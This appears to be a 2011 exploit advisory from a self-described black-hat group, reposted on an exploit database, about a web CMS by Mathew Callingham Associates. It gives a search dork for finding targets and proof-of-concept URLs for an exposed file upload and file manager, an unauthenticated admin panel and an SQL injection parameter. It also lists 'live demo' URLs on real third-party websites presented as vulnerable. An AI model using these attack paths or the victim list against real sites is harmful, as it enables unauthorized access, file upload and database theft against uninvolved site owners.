Mathew Callingham Associatess 3.x.x Multiple Vulnerability

🗓️ 21 May 2011 00:00:00Reported by Net.Edit0rType

zdt🔗 0day.today👁 22 Views

Mathew Callingham Associates 3.x.x Multiple Vulnerability found in admin directory. Vulnerability discovered on 20 May 2011 and advisory released on 21 May 2011

[+]Title :.......Mathew Callingham Associatess 3.x.x Multiple Vulnerability
[+]Author :......Net.Edit0r
[+]Tested on :...Linux/PHP
---------------------------------------------------------------------------
[~] Founded by Net.Edit0r
[~] Team: Black Hat Group #BHG
[~] Contact: [email protected]
[~] Home: http://Black-HG.Org
[~] Vendor: http://designer-website.com/
[~] Category: Web Apps

==========ExPl0iT3d by Net.Edit0r==========

[+] DORK: "Designed by Mathew Callingham Associates"


[ I ].   Multiple Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[+++] Important: The security problem in the directory "admin" has been created.


[P0C]:  http://127.0.0.1/admin/editor/filemanager/upload/test.html

[P0C]:  http://127.0.0.1/admin/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

[P0C]:  http://127.0.0.1/admin/ Admin PaneL Edite Page !

[P0C]:  http://127.0.0.1/viewclassified.php?classified=[SQL]

[L!v3 D3m0's]:

http://www.stockton-dancing.co.uk/admin/ <> 1

http://www.1pricepcrepairs.com/admin/ <> 1

http://platinumbuilders.co.uk/admin/editor/filemanager/upload/test.html <> 2

http://www.holbro.net/admin/editor/filemanager/upload/test.html <> 2

http://www.carpfishingtips.co.uk/viewclassified.php?classified=15 [SQL] <> 3

http://www.dcs-paving.co.uk/admin/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
<> 4

http://www.stockton-dancing.co.uk/admin/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
<> 4

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[+] TIME TABLE:

20 May 2011 - Vulnerability discovered.
21  May 2011  - Advisory released.


===========================================================================================
[!] Black Hat Group ./Iranian HackerZ
===========================================================================================
[!] MaiL: [email protected] ~ [email protected]
===========================================================================================
[!] Greetz To : DarkCoder | Amir-MaGiC | 3H34N | H3x | D3adlY & All
Iranian HackerZ
===========================================================================================
[!] Spec Th4nks: HUrr!c4nE | B3hz4d | M4Hd1 | Cho0bin And All My Friendz
===========================================================================================
[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
===========================================================================================



#  0day.today [2018-01-03]  #

21 May 2011 00:00Current

7.1High risk

Vulners AI Score7.1